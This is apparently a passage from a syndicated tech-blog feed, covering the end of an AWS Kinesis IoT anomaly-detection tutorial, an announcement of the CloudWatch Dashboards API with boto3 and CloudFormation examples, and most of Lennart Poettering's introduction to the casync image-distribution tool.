  3. The Python code provided below simulates a streaming application, such as an IoT device, and generates random data and anomalies into a Kinesis stream. The code generates two temperature ranges, where the first range is the hypothetical sensor’s normal operating temperature range (10–20), and the second is the anomaly temperature range (100–120). Make sure to change the stream name on lines 16 and 20 and the Region on line 6 to match your configuration. Alternatively, you can download the Amazon Kinesis Data Generator from this repository and use it to generate the data.
    import json
    import datetime
    import random
    import testdata
    from boto import kinesis
    
    kinesis = kinesis.connect_to_region("us-east-1")
    
    def getData(iotName, lowVal, highVal):
       data = {}
       data["iotName"] = iotName
       data["iotValue"] = random.randint(lowVal, highVal) 
       return data
    
    while 1:
       rnd = random.random()
       if (rnd < 0.01):
          data = json.dumps(getData("DemoSensor", 100, 120))  
          kinesis.put_record("RawStreamData", data, "DemoSensor")
          print '***************************** anomaly ************************* ' + data
       else:
          data = json.dumps(getData("DemoSensor", 10, 20))  
          kinesis.put_record("RawStreamData", data, "DemoSensor")
          print data

  4. Open the Amazon Elasticsearch Service console and create a new domain.
    1. Give the domain a unique name. In the Configure cluster screen, use the default settings.
    2. In the Set up access policy screen, in the Set the domain access policy list, choose Allow access to the domain from specific IP(s).
    3. Enter the public IP address of your computer.
      Note: If you’re working behind a proxy or firewall, see the “Use a proxy to simplify request signing” section in this AWS Database blog post to learn how to work with a proxy. For additional information about securing access to your Amazon ES domain, see How to Control Access to Your Amazon Elasticsearch Domain in the AWS Security Blog.
  5. After the Amazon ES domain is up and running, you can set up and configure Kinesis Firehose to export results to Amazon ES:
    1. Open the Amazon Kinesis Firehose console and choose Create Delivery Stream.
    2. In the Destination dropdown list, choose Amazon Elasticsearch Service.
    3. Type a stream name, and choose the Amazon ES domain that you created in Step 4.
    4. Provide an index name and ES type. In the S3 bucket dropdown list, choose Create New S3 bucket. Choose Next.
    5. In the configuration, change the Elasticsearch Buffer size to 1 MB and the Buffer interval to 60s. Use the default settings for all other fields. This shortens the time for the data to reach the ES cluster.
    6. Under IAM Role, choose Create/Update existing IAM role.
      The best practice is to create a new role every time. Otherwise, the console keeps adding policy documents to the same role. Eventually the size of the attached policies causes IAM to reject the role, but it does so in a non-obvious way: the console basically stops functioning.
    7. Choose Next to move to the Review page.
  6. Review the configuration, and then choose Create Delivery Stream.
  7. Run the Python file for 1–2 minutes, and then press Ctrl+C to stop the execution. This loads some data into the stream for you to visualize in the next step.

Analyzing the data

Now it’s time to analyze the IoT streaming data using Amazon Kinesis Analytics.

  1. Open the Amazon Kinesis Analytics console and create a new application. Give the application a name, and then choose Create Application.
  2. On the next screen, choose Connect to a source. Choose the raw incoming data stream that you created earlier. (Note the stream name Source_SQL_STREAM_001 because you will need it later.)
  3. Use the default settings for everything else. When the schema discovery process is complete, it displays a success message with the formatted stream sample in a table as shown in the following screenshot. Review the data, and then choose Save and continue.
  4. Next, choose Go to SQL editor. When prompted, choose Yes, start application.
  5. Copy the following SQL code and paste it into the SQL editor window.
    CREATE OR REPLACE STREAM "TEMP_STREAM" (
       "iotName"        varchar (40),
       "iotValue"   integer,
       "ANOMALY_SCORE"  DOUBLE);
    -- Creates an output stream and defines a schema
    CREATE OR REPLACE STREAM "DESTINATION_SQL_STREAM" (
       "iotName"       varchar(40),
       "iotValue"       integer,
       "ANOMALY_SCORE"  DOUBLE,
       "created" TimeStamp);
     
    -- Compute an anomaly score for each record in the source stream
    -- using Random Cut Forest
    CREATE OR REPLACE PUMP "STREAM_PUMP_1" AS INSERT INTO "TEMP_STREAM"
    SELECT STREAM "iotName", "iotValue", ANOMALY_SCORE FROM
      TABLE(RANDOM_CUT_FOREST(
        CURSOR(SELECT STREAM * FROM "SOURCE_SQL_STREAM_001")
      )
    );
    
    -- Sort records by descending anomaly score, insert into output stream
    CREATE OR REPLACE PUMP "OUTPUT_PUMP" AS INSERT INTO "DESTINATION_SQL_STREAM"
    SELECT STREAM "iotName", "iotValue", ANOMALY_SCORE, ROWTIME FROM "TEMP_STREAM"
    ORDER BY FLOOR("TEMP_STREAM".ROWTIME TO SECOND), ANOMALY_SCORE DESC;

 

  6. Choose Save and run SQL.
    As the application is running, it displays the results as stream data arrives. If you don’t see any data coming in, run the Python script again to generate some fresh data. When there is data, it appears in a grid as shown in the following screenshot. Note that you are selecting data from the source stream name Source_SQL_STREAM_001 that you created previously. Also note the ANOMALY_SCORE column. This is the value that the Random_Cut_Forest function calculates based on the temperature ranges provided by the Python script. Higher (anomaly) temperature ranges have a higher score. Looking at the SQL code, note that the first two blocks of code create two new streams to store temporary data and the final result. The third block of code analyzes the raw source data (Stream_Pump_1) using the Random_Cut_Forest function. It calculates an anomaly score (ANOMALY_SCORE) and inserts it into the TEMP_STREAM stream. The final code block loads the result stored in the TEMP_STREAM into DESTINATION_SQL_STREAM.
  7. Choose Exit (done editing) next to the Save and run SQL button to return to the application configuration page.

Load processed data into the Kinesis Firehose delivery stream

Now, you can export the result from DESTINATION_SQL_STREAM into the Amazon Kinesis Firehose stream that you created previously.

  1. On the application configuration page, choose Connect to a destination.
  2. Choose the stream name that you created earlier, and use the default settings for everything else. Then choose Save and Continue.
  3. On the application configuration page, choose Exit to Kinesis Analytics applications to return to the Amazon Kinesis Analytics console.
  4. Run the Python script again for 4–5 minutes to generate enough data to flow through Amazon Kinesis Streams, Kinesis Analytics, Kinesis Firehose, and finally into the Amazon ES domain.
  5. Open the Kinesis Firehose console, choose the stream, and then choose the Monitoring tab.
  6. As the processed data flows into Kinesis Firehose and Amazon ES, the metrics appear on the Delivery Stream metrics page. Keep in mind that the metrics page takes a few minutes to refresh with the latest data.
  7. Open the Amazon Elasticsearch Service dashboard in the AWS Management Console. The count in the Searchable documents column increases as shown in the following screenshot. In addition, the domain shows a cluster health of Yellow. This is because, by default, it needs two instances to deploy redundant copies of the index. To fix this, you can deploy two instances instead of one.

Visualize the data using Kibana

Now it’s time to launch Kibana and visualize the data.

  1. Use the ES domain link to go to the cluster detail page, and then choose the Kibana link as shown in the following screenshot.

    If you’re working behind a proxy or firewall, see the “Use a proxy to simplify request signing” section in this blog post to learn how to work with a proxy.
  2. In the Kibana dashboard, choose the Discover tab to perform a query.
  3. You can also visualize the data using the different types of charts offered by Kibana. For example, by going to the Visualize tab, you can quickly create a split bar chart that aggregates by ANOMALY_SCORE per minute.


Conclusion

In this post, you learned how to use Amazon Kinesis to collect, process, and analyze real-time streaming data, and then export the results to Amazon ES for analysis and visualization with Kibana. If you have comments about this post, add them to the “Comments” section below. If you have questions or issues with implementing this solution, please open a new thread on the Amazon Kinesis or Amazon ES discussion forums.


Next Steps

Take your skills to the next level. Learn real-time clickstream anomaly detection with Amazon Kinesis Analytics.

 


About the Author

Tristan Li is a Solutions Architect with Amazon Web Services. He works with enterprise customers in the US, helping them adopt cloud technology to build scalable and secure solutions on AWS.


New – API & CloudFormation Support for Amazon CloudWatch Dashboards

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/new-api-cloudformation-support-for-amazon-cloudwatch-dashboards/

We launched CloudWatch Dashboards a couple of years ago. In the post that I wrote for the launch, I showed you how to interactively create a dashboard that displayed chosen CloudWatch metrics in graphical form. After the launch, we added additional features including a full screen mode, a dark theme, control over the range of the Y axis, simplified renaming, persistent storage, and new visualization options.

New API & CLI
While console support is wonderful for interactive use, many customers have asked us to support programmatic creation and manipulation of dashboards and the widgets within. They would like to dynamically build and maintain dashboards, adding and removing widgets as the corresponding AWS resources are created and destroyed. Other customers are interested in setting up and maintaining a consistent set of dashboards across two or more AWS accounts.

I am happy to announce that API, CLI, and AWS CloudFormation support for CloudWatch Dashboards is available now and that you can start using it today!

There are four new API functions (and equivalent CLI commands):

ListDashboards / aws cloudwatch list-dashboards – Fetch a list of all dashboards within an account, or a subset that share a common prefix.

GetDashboard / aws cloudwatch get-dashboard – Fetch details for a single dashboard.

PutDashboard / aws cloudwatch put-dashboard – Create a new dashboard or update an existing one.

DeleteDashboards / aws cloudwatch delete-dashboards – Delete one or more dashboards.
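
Here’s a quick boto3 sketch of three of these calls, just to show the shape of the API (the dashboard name EC2_Networking matches the example built later in this post, and the delete call is commented out so nothing is removed by accident):

import boto3

cw = boto3.client("cloudwatch")

# List every dashboard in the account (pass DashboardNamePrefix= to filter)
for entry in cw.list_dashboards()["DashboardEntries"]:
    print(entry["DashboardName"], entry["Size"])

# Fetch the JSON body of a single dashboard
body = cw.get_dashboard(DashboardName="EC2_Networking")["DashboardBody"]
print(body)

# Delete one or more dashboards
# cw.delete_dashboards(DashboardNames=["EC2_Networking"])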

Dashboard Concepts
I want to show you how to use these functions and commands. Before I dive in, I should review a couple of important dashboard concepts and attributes.

Global – Dashboards are part of an AWS account, and are not associated with a specific AWS Region. Each account can have up to 500 dashboards.

Named – Each dashboard has a name that is unique within the AWS account. Names can be up to 255 characters long.

Grid Model – Each dashboard is composed of a grid of cells. The grid is 24 cells across and as tall as necessary. Each widget on the dashboard is positioned at a particular set of grid coordinates, and has a size that spans an integral number of grid cells.

Widgets (Visualizations) – Each widget can display text or a set of CloudWatch metrics. Text is specified using Markdown; metrics can be displayed as single values, line charts, or stacked area charts. Each dashboard can have up to 100 widgets. Widgets that display metrics can also be associated with a CloudWatch Alarm.

Dashboards have a JSON representation that you can now see and edit from within the console. Simply click on the Action menu and choose View/edit source:

Here’s the source for my dashboard:

You can use this JSON as a starting point for your own applications. As you can see, there’s an entry in the widgets array for each widget on the dashboard; each entry describes one widget, starting with its type, position, and size.

Creating a Dashboard Using the API
Let’s say I want to create a dashboard that has a widget for each of my EC2 instances in a particular region. I’ll use Python and the AWS SDK for Python, and start as follows (excuse the amateur nature of my code):

import boto3
import json

cw  = boto3.client("cloudwatch")
ec2 = boto3.client("ec2")

x, y          = [0, 0]
width, height = [3, 3]
max_width     = 12
widgets       = []

Then I simply iterate over the instances, creating a widget dictionary for each one, and appending it to the widgets array:

instances = ec2.describe_instances()
for r in instances['Reservations']:
    for i in r['Instances']:

        widget = {'type'      : 'metric',
                  'x'         : x,
                  'y'         : y,
                  'height'    : height,
                  'width'     : width,
                  'properties': {'view'    : 'timeSeries',
                                 'stacked' : False,
                                 'metrics' : [['AWS/EC2', 'NetworkIn', 'InstanceId', i['InstanceId']],
                                              ['.',       'NetworkOut', '.',         '.']
                                             ],
                                 'period'  : 300,
                                 'stat'    : 'Average',
                                 'region'  : 'us-east-1',
                                 'title'   : i['InstanceId']
                                }
                 }

        widgets.append(widget)

I update the position (x and y) within the loop, and form a grid (if I don’t specify positions, the widgets will be laid out left to right, top to bottom):

        x += width
        if (x + width > max_width):
            x = 0
            y += height

After I have processed all of the instances, I create a JSON version of the widget array:

body   = {'widgets' : widgets}
body_j = json.dumps(body)

And I create or update my dashboard:

cw.put_dashboard(DashboardName = "EC2_Networking",
                 DashboardBody = body_j)

I run the code, and get the following dashboard:

The CloudWatch team recommends that dashboards created programmatically include a text widget indicating that the dashboard was generated automatically, along with a link to the source code or CloudFormation template that did the work. This will discourage users from making manual, out-of-band changes to the dashboards.
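
For example, here’s a rough sketch of such a notice widget, added to the widgets array before the put_dashboard call above (the script name and repository URL are placeholders; omitting x and y lets CloudWatch lay the widget out automatically, as noted earlier):

# Hypothetical notice widget; the markdown link target is a placeholder.
notice = {'type'      : 'text',
          'width'     : 12,
          'height'    : 2,
          'properties': {'markdown': 'Generated automatically by '
                                     '[build_dashboard.py](https://example.com/dashboards). '
                                     'Manual edits will be overwritten.'}}
widgets.append(notice)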

As I mentioned earlier, each metric widget can also be associated with a CloudWatch Alarm. You can create the alarms programmatically or by using a CloudFormation template such as the Sample CPU Utilization Alarm. If you decide to do this, the alarm threshold will be displayed in the widget. To learn more about this, read Tara Walker’s recent post, Amazon CloudWatch Launches Alarms on Dashboards.

Going one step further, I could use CloudWatch Events and a Lambda function to track the creation and deletion of certain resources and update a dashboard in concert with the changes. To learn how to do this, read Keeping CloudWatch Dashboards up to Date Using AWS Lambda.
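
A bare-bones sketch of that idea (not the code from the linked post): a Lambda handler, triggered by a CloudWatch Events rule for EC2 instance state changes, that simply rebuilds the whole dashboard. Here build_widgets() is a hypothetical helper standing in for the widget-building loop shown earlier.

import json
import boto3

cw = boto3.client("cloudwatch")

def handler(event, context):
    # Rebuild the dashboard whenever an instance changes state.
    if event.get("detail-type") == "EC2 Instance State-change Notification":
        body = {"widgets": build_widgets()}  # hypothetical helper, see the loop above
        cw.put_dashboard(DashboardName="EC2_Networking",
                         DashboardBody=json.dumps(body))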

Accessing a Dashboard Using the CLI
I can also access and manipulate my dashboards from the command line. For example, I can generate a simple list:

$ aws cloudwatch list-dashboards --output table
----------------------------------------------
|               ListDashboards               |
+--------------------------------------------+
||             DashboardEntries             ||
|+-----------------+----------------+-------+|
||  DashboardName  | LastModified   | Size  ||
|+-----------------+----------------+-------+|
||  Disk-Metrics   |  1496405221.0  |  316  ||
||  EC2_Networking |  1498090434.0  |  2830 ||
||  Main-Metrics   |  1498085173.0  |  234  ||
|+-----------------+----------------+-------+|

And I can get rid of the Disk-Metrics dashboard:

$ aws cloudwatch delete-dashboards --dashboard-names Disk-Metrics

I can also retrieve the JSON that defines a dashboard:

Creating a Dashboard Using CloudFormation
Dashboards can also be specified in CloudFormation templates. Here’s a simple template in YAML (the DashboardBody is still specified in JSON):

Resources:
  MyDashboard:
    Type: "AWS::CloudWatch::Dashboard"
    Properties:
      DashboardName: SampleDashboard
      DashboardBody: '{"widgets":[{"type":"text","x":0,"y":0,"width":6,"height":6,"properties":{"markdown":"Hi there from CloudFormation"}}]}'

I place the template in a file and then create a stack using the console or the CLI:

$ aws cloudformation create-stack --stack-name MyDashboard --template-body file://dash.yaml
{
    "StackId": "arn:aws:cloudformation:us-east-1:xxxxxxxxxxxx:stack/MyDashboard/a2a3fb20-5708-11e7-8ffd-500c21311262"
}

Here’s the dashboard:

Available Now
This feature is available now and you can start using it today. You can create 3 dashboards with up to 50 metrics per dashboard at no charge; additional dashboards are priced at $3 per month, as listed on the CloudWatch Pricing page. You can make up to 1 million calls to the new API functions each month at no charge; beyond that you pay $.01 for every 1,000 calls.

Jeff;

casync — A tool for distributing file system images

Post Syndicated from Lennart Poettering original http://0pointer.net/blog/casync-a-tool-for-distributing-file-system-images.html

Introducing casync

In the past months I have been working on a new project:
casync. casync takes
inspiration from the popular rsync file
synchronization tool as well as the probably even more popular
git revision control system. It combines the
idea of the rsync algorithm with the idea of git-style
content-addressable file systems, and creates a new system for
efficiently storing and delivering file system images, optimized for
high-frequency update cycles over the Internet. Its current focus is
on delivering IoT, container, VM, application, portable service or OS
images, but I hope to extend it later in a generic fashion to become
useful for backups and home directory synchronization as well (but
more about that later).

The basic technological building blocks casync is built from are
neither new nor particularly innovative (at least not anymore),
however the way casync combines them is different from existing tools,
and that’s what makes it useful for a variety of use-cases that other
tools can’t cover that well.

Why?

I created casync after studying how today’s popular tools store and
deliver file system images. To briefly name a few: Docker has a
layered tarball approach,
OSTree serves the
individual files directly via HTTP and maintains packed deltas to
speed up updates, while other systems operate on the block layer and
place raw squashfs images (or other archival file systems, such as
ISO 9660) for download on HTTP shares (in the better cases combined
with zsync data).

Neither of these approaches appeared fully convincing to me when used
in high-frequency update cycle systems. In such systems, it is
important to optimize towards a couple of goals:

  1. Most importantly, make updates cheap traffic-wise (for this most tools use image deltas of some form)
  2. Put boundaries on disk space usage on servers (keeping deltas between all version combinations clients might want to run updates between, would suggest keeping an exponentially growing amount of deltas on servers)
  3. Put boundaries on disk space usage on clients
  4. Be friendly to Content Delivery Networks (CDNs), i.e. serve neither too many small nor too many overly large files, and only require the most basic form of HTTP. Provide the repository administrator with high-level knobs to tune the average file size delivered.
  5. Simplicity to use for users, repository administrators and developers

I don’t think any of the tools mentioned above are really good on more
than a small subset of these points.

Specifically: Docker’s layered tarball approach dumps the “delta”
question onto the feet of the image creators: the best way to make
your image downloads minimal is basing your work on an existing image
clients might already have, and inherit its resources, maintaining full
history. Here, revision control (a tool for the developer) is
intermingled with update management (a concept for optimizing
production delivery). As container histories grow individual deltas
are likely to stay small, but on the other hand a brand-new deployment
usually requires downloading the full history onto the deployment
system, even though there’s no use for it there, and likely requires
substantially more disk space and download sizes.

OSTree’s serving of individual files is unfriendly to CDNs (as many
small files in file trees cause an explosion of HTTP GET
requests). To counter that OSTree supports placing pre-calculated
delta images between selected revisions on the delivery servers, which
means a certain amount of revision management, that leaks into the
clients.

Delivering direct squashfs (or other file system) images is almost
beautifully simple, but of course means every update requires a full
download of the newest image, which is both bad for disk usage and
generated traffic. Enhancing it with zsync makes this a much better
option, as it can reduce generated traffic substantially at very
little cost of history/meta-data (no explicit deltas between a large
number of versions need to be prepared server side). On the other hand
server requirements in disk space and functionality (HTTP Range
requests) are minus points for the use-case I am interested in.

(Note: all the mentioned systems have great properties, and it’s not
my intention to badmouth them. The only point I am trying to make is
that for the use case I care about — file system image delivery with
high-frequency update cycles — each system comes with certain
drawbacks.)

Security & Reproducibility

Besides the issues pointed out above I wasn’t happy with the security
and reproducibility properties of these systems. In today’s world
where security breaches involving hacking and breaking into connected
systems happen every day, an image delivery system that cannot make
strong guarantees regarding data integrity is out of
date. Specifically, the tarball format is famously nondeterministic:
the very same file tree can result in any number of different
valid serializations depending on the tool used, its version and the
underlying OS and file system. Some tar implementations attempt to
correct that by guaranteeing that each file tree maps to exactly
one valid serialization, but such a property is always only specific
to the tool used. I strongly believe that any good update system must
guarantee on every single link of the chain that there’s only one
valid representation of the data to deliver, that can easily be
verified.

What casync Is

So much about the background why I created casync. Now, let’s have a
look what casync actually is like, and what it does. Here’s the brief
technical overview:

Encoding: Let’s take a large linear data stream, split it into
variable-sized chunks (the size of each being a function of the
chunk’s contents), and store these chunks in individual, compressed
files in some directory, each file named after a strong hash value of
its contents, so that the hash value may be used as a key for
retrieving the full chunk data. Let’s call this directory a “chunk
store”. At the same time, generate a “chunk index” file that lists
these chunk hash values plus their respective chunk sizes in a simple
linear array. The chunking algorithm is supposed to create variable,
but similarly sized chunks from the data stream, and do so in a way
that the same data results in the same chunks even if placed at
varying offsets. For more information see this blog
story
.

Decoding: Let’s take the chunk index file, and reassemble the large
linear data stream by concatenating the uncompressed chunks retrieved
from the chunk store, keyed by the listed chunk hash values.
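
To make the encoding/decoding idea a bit more concrete, here is a toy Python sketch of the scheme. It is not casync’s implementation (casync uses a buzhash rolling hash, SHA256 and xz, and a far more careful chunking strategy); the boundary function, the zlib compression, and the loose-file store below are simplifications for illustration only.

import hashlib
import os
import zlib

MIN_CHUNK = 2048        # never cut a chunk shorter than this
BOUNDARY_MASK = 0xFFF   # boundary fires on average every ~4 KiB past the minimum

def chunk_boundaries(data):
    """Yield (start, end) offsets of content-defined chunks."""
    start, h = 0, 0
    for i, byte in enumerate(data):
        h = (h * 31 + byte) & 0xFFFFFFFF       # toy content-derived hash
        if i - start >= MIN_CHUNK and (h & BOUNDARY_MASK) == 0:
            yield start, i + 1
            start, h = i + 1, 0
    if start < len(data):
        yield start, len(data)

def encode(data, store):
    """Split, compress and store chunks; return the chunk index."""
    os.makedirs(store, exist_ok=True)
    index = []
    for start, end in chunk_boundaries(data):
        chunk = data[start:end]
        digest = hashlib.sha256(chunk).hexdigest()
        path = os.path.join(store, digest)
        if not os.path.exists(path):           # identical chunks are stored only once
            with open(path, "wb") as f:
                f.write(zlib.compress(chunk))
        index.append((digest, end - start))
    return index                               # list of (hash, size): the "chunk index"

def decode(index, store):
    """Reassemble the original stream from the index and the chunk store."""
    out = bytearray()
    for digest, _size in index:
        with open(os.path.join(store, digest), "rb") as f:
            out += zlib.decompress(f.read())
    return bytes(out)

Because identical content produces identical digests, encoding a second, similar stream into the same store only adds the chunks that actually differ, which is the property the rest of this description builds on.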

As an extra twist, we introduce a well-defined, reproducible,
random-access serialization format for file trees (think: a more
modern tar), to permit efficient, stable storage of complete file
trees in the system, simply by serializing them and then passing them
into the encoding step explained above.

Finally, let’s put all this on the network: for each image you want to
deliver, generate a chunk index file and place it on an HTTP
server. Do the same with the chunk store, and share it between the
various index files you intend to deliver.

Why bother with all of this? Streams with similar contents will result
in mostly the same chunk files in the chunk store. This means it is
very efficient to store many related versions of a data stream in the
same chunk store, thus minimizing disk usage. Moreover, when
transferring linear data streams chunks already known on the receiving
side can be made use of, thus minimizing network traffic.

Why is this different from rsync or OSTree, or similar tools? Well,
one major difference between casync and those tools is that we
remove file boundaries before chunking things up. This means that
small files are lumped together with their siblings and large files
are chopped into pieces, which permits us to recognize similarities in
files and directories beyond file boundaries, and makes sure our chunk
sizes are pretty evenly distributed, without the file boundaries
affecting them.

The “chunking” algorithm is based on the buzhash rolling hash
function. SHA256 is used as strong hash function to generate digests
of the chunks. xz is used to compress the individual chunks.

Here’s a diagram, hopefully explaining a bit how the encoding process
works, were it not for my crappy drawing skills:

Diagram

The diagram shows the encoding process from top to bottom. It starts
with a block device or a file tree, which is then serialized and
chunked up into variable sized blocks. The compressed chunks are then
placed in the chunk store, while a chunk index file is written listing
the chunk hashes in order. (The original SVG of this graphic may be
found here.)

Details

Note that casync operates on two different layers, depending on the
use-case of the user:

  1. You may use it on the block layer. In this case the raw block data
    on disk is taken as-is, read directly from the block device, split
    into chunks as described above, compressed, stored and delivered.

  2. You may use it on the file system layer. In this case, the
    file tree serialization format mentioned above comes into play:
    the file tree is serialized depth-first (much like tar would do
    it) and then split into chunks, compressed, stored and delivered.

The fact that it may be used on both the block and file system layer
opens it up for a variety of different use-cases. In the VM and IoT
ecosystems shipping images as block-level serializations is more
common, while in the container and application world file-system-level
serializations are more typically used.

Chunk index files referring to block-layer serializations carry the
.caibx suffix, while chunk index files referring to file system
serializations carry the .caidx suffix. Note that you may also use
casync as a direct tar replacement, i.e. without the chunking, just
generating the plain linear file tree serialization. Such files
carry the .catar suffix. Internally .caibx are identical to
.caidx files, the only difference is semantical: .caidx files
describe a .catar file, while .caibx files may describe any other
blob. Finally, chunk stores are directories carrying the .castr
suffix.

Features

Here are a couple of other features casync has:

  1. When downloading a new image you may use casync‘s --seed=
    feature: each block device, file, or directory specified is processed
    using the same chunking logic described above, and is used as
    preferred source when putting together the downloaded image locally,
    avoiding network transfer of it. This of course is useful whenever
    updating an image: simply specify one or more old versions as seed and
    only download the chunks that truly changed since then. Note that
    using seeds requires no history relationship between seed and the new
    image to download. This has major benefits: you can even use it to
    speed up downloads of relatively foreign and unrelated data. For
    example, when downloading a container image built using Ubuntu you can
    use your Fedora host OS tree in /usr as seed, and casync will
    automatically use whatever it can from that tree, for example timezone
    and locale data that tends to be identical between
    distributions. Example: casync extract
    http://example.com/myimage.caibx --seed=/dev/sda1 /dev/sda2
    . This
    will place the block-layer image described by the indicated URL in the
    /dev/sda2 partition, using the existing /dev/sda1 data as seeding
    source. An invocation like this could be typically used by IoT systems
    with an A/B partition setup. Example 2: casync extract
    http://example.com/mycontainer-v3.caidx --seed=/srv/container-v1
    --seed=/srv/container-v2 /src/container-v3
    , is very similar but
    operates on the file system layer, and uses two old container versions
    to seed the new version.

  2. When operating on the file system level, the user has fine-grained
    control on the meta-data included in the serialization. This is
    relevant since different use-cases tend to require a different set of
    saved/restored meta-data. For example, when shipping OS images, file
    access bits/ACLs and ownership matter, while file modification times
    hurt. When doing personal backups OTOH file ownership matters little
    but file modification times are important. Moreover different backing
    file systems support different feature sets, and storing more
    information than necessary might make it impossible to validate a tree
    against an image if the meta-data cannot be replayed in full. Due to
    this, casync provides a set of --with= and --without= parameters
    that allow fine-grained control of the data stored in the file tree
    serialization, including the granularity of modification times and
    more. The precise set of selected meta-data features is also always
    part of the serialization, so that seeding can work correctly and
    automatically.

  3. casync tries to be as accurate as possible when storing file
    system meta-data. This means that besides the usual baseline of file
    meta-data (file ownership and access bits), and more advanced features
    (extended attributes, ACLs, file capabilities) a number of more exotic
    data is stored as well, including Linux
    chattr(1) file attributes, as
    well as FAT file
    attributes

    (you may wonder why the latter? — EFI is FAT, and /efi is part of
    the comprehensive serialization of any host). In the future I intend
    to extend this further, for example storing btrfs sub-volume
    information where available. Note that as described above every single
    type of meta-data may be turned off and on individually, hence if you
    don’t need FAT file bits (and I figure it’s pretty likely you don’t),
    then they won’t be stored.

  4. The user creating .caidx or .caibx files may control the desired
    average chunk length (before compression) freely, using the
    --chunk-size= parameter. Smaller chunks increase the number of
    generated files in the chunk store and increase HTTP GET load on the
    server, but also ensure that sharing between similar images is
    improved, as identical patterns in the images stored are more likely
    to be recognized. By default casync will use a 64K average chunk
    size. Tweaking this can be particularly useful when adapting the
    system to specific CDNs, or when delivering compressed disk images
    such as squashfs (see below).

  5. Emphasis is placed on making all invocations reproducible,
    well-defined and strictly deterministic. As mentioned above this is a
    requirement to reach the intended security guarantees, but is also
    useful for many other use-cases. For example, the casync digest
    command may be used to calculate a hash value identifying a specific
    directory in all desired detail (use --with= and --without to pick
    the desired detail). Moreover the casync mtree command may be used
    to generate a BSD mtree(5) compatible manifest of a directory tree,
    .caidx or .catar file.

  6. The file system serialization format is nicely composable. By this
    I mean that the serialization of a file tree is the concatenation of
    the serializations of all files and file sub-trees located at the
    top of the tree, with zero meta-data references from any of these
    serializations into the others. This property is essential to ensure
    maximum reuse of chunks when similar trees are serialized.

  7. When extracting file trees or disk image files, casync
    will automatically create
    reflinks
    from any specified seeds if the underlying file system supports it
    (such as btrfs, ocfs, and future xfs). After all, instead of
    copying the desired data from the seed, we can just tell the file
    system to link up the relevant blocks. This works both when extracting
    .caidx and .caibx files — the latter of course only when the
    extracted disk image is placed in a regular raw image file on disk,
    rather than directly on a plain block device, as plain block devices
    do not know the concept of reflinks.

  8. Optionally, when extracting file trees, casync can
    create traditional UNIX hard-links for identical files in specified
    seeds (--hardlink=yes). This works on all UNIX file systems, and can
    save substantial amounts of disk space. However, this only works for
    very specific use-cases where disk images are considered read-only
    after extraction, as any changes made to one tree will propagate to
    all other trees sharing the same hard-linked files, as that’s the
    nature of hard-links. In this mode, casync exposes OSTree-like
    behavior, which is built heavily around read-only hard-link trees.

  9. casync tries to be smart when choosing what to include in file
    system images. Implicitly, file systems such as procfs and sysfs are
    excluded from serialization, as they expose API objects, not real
    files. Moreover, the “nodump” (+d)
    chattr(1) flag is honored by
    default, permitting users to mark files to exclude from serialization.

  10. When creating and extracting file trees casync may apply an
    automatic or explicit UID/GID shift. This is particularly useful when
    transferring container images for use with Linux user namespacing.

  11. In addition to local operation, casync currently supports HTTP,
    HTTPS, FTP and ssh natively for downloading chunk index files and
    chunks (the ssh mode requires installing casync on the remote host,
    though, but an sftp mode not requiring that should be easy to
    add). When creating index files or chunks, only ssh is supported as
    remote back-end.

  12. When operating on block-layer images, you may expose locally or
    remotely stored images as local block devices. Example: casync mkdev
    http://example.com/myimage.caibx
    exposes the disk image described by
    the indicated URL as local block device in /dev, which you then may
    use the usual block device tools on, such as mount or fdisk (only
    read-only though). Chunks are downloaded on access with high priority,
    and at low priority when idle in the background. Note that in this
    mode, casync also plays a role similar to “dm-verity”, as all blocks
    are validated against the strong digests in the chunk index file
    before passing them on to the kernel’s block layer. This feature is
    implemented through Linux’ NBD kernel facility.

  13. Similarly, when operating on file-system-layer images, you may mount
    locally or remotely stored images as regular file systems. Example:
    casync mount http://example.com/mytree.caidx /srv/mytree mounts the
    file tree image described by the indicated URL as a local directory
    /srv/mytree. This feature is implemented through Linux’ FUSE kernel
    facility. Note that special care is taken that the images exposed this
    way can be packed up again with casync make and are guaranteed to
    return the bit-by-bit exact same serialization again that it was
    mounted from. No data is lost or changed while passing things through
    FUSE (OK, strictly speaking this is a lie, we do lose ACLs, but that’s
    hopefully just a temporary gap to be fixed soon).

  14. In IoT A/B fixed size partition setups the file systems placed in
    the two partitions are usually much smaller than the partition size,
    in order to keep some room for later, larger updates. casync is able
    to analyze the super-block of a number of common file systems in order
    to determine the actual size of a file system stored on a block
    device, so that writing a file system to such a partition and reading
    it back again will result in reproducible data. Moreover this speeds
    up the seeding process, as there’s little point in seeding the unused
    space after the file system within the partition.

Example Command Lines

Here’s how to use casync, explained with a few examples:

$ casync make foobar.caidx /some/directory

This will create a chunk index file foobar.caidx in the local
directory, and populate the chunk store directory default.castr
located next to it with the chunks of the serialization (you can
change the name for the store directory with --store= if you
like). This command operates on the file-system level. A similar
command operating on the block level:

$ casync make foobar.caibx /dev/sda1

This command creates a chunk index file foobar.caibx in the local
directory describing the current contents of the /dev/sda1 block
device, and populates default.castr in the same way as above. Note
that you may as well read a raw disk image from a file instead of a
block device:

$ casync make foobar.caibx myimage.raw

To reconstruct the original file tree from the .caidx file and
the chunk store of the first command, use:

$ casync extract foobar.caidx /some/other/directory

And similar for the block-layer version:

$ casync extract foobar.caibx /dev/sdb1

or, to extract the block-layer version into a raw disk image:

$ casync extract foobar.caibx myotherimage.raw

The above are the most basic commands, operating on local data
only. Now let’s make this more interesting, and reference remote
resources:

$ casync extract http://example.com/images/foobar.caidx /some/other/directory

This extracts the specified .caidx onto a local directory. This of
course assumes that foobar.caidx was uploaded to the HTTP server in
the first place, along with the chunk store. You can use any command
you like to accomplish that, for example scp or
rsync. Alternatively, you can let casync do this directly when
generating the chunk index:

$ casync make ssh.example.com:images/foobar.caidx /some/directory

This will use ssh to connect to the ssh.example.com server, and then
place the .caidx file and the chunks on it. Note that this mode of
operation is “smart”: this scheme will only upload chunks currently
missing on the server side, and not re-transmit what is already
available.

Note that you can always configure the precise path or URL of the
chunk store via the --store= option. If you do not do that, then the
store path is automatically derived from the path or URL: the last
component of the path or URL is replaced by default.castr.

Of course, when extracting .caidx or .caibx files from remote sources,
using a local seed is advisable:

$ casync extract http://example.com/images/foobar.caidx --seed=/some/existing/directory /some/other/directory

Or on the block layer:

$ casync extract http://example.com/images/foobar.caibx --seed=/dev/sda1 /dev/sdb2

When creating chunk indexes on the file system layer casync will by
default store meta-data as accurately as possible. Let’s create a chunk
index with reduced meta-data:

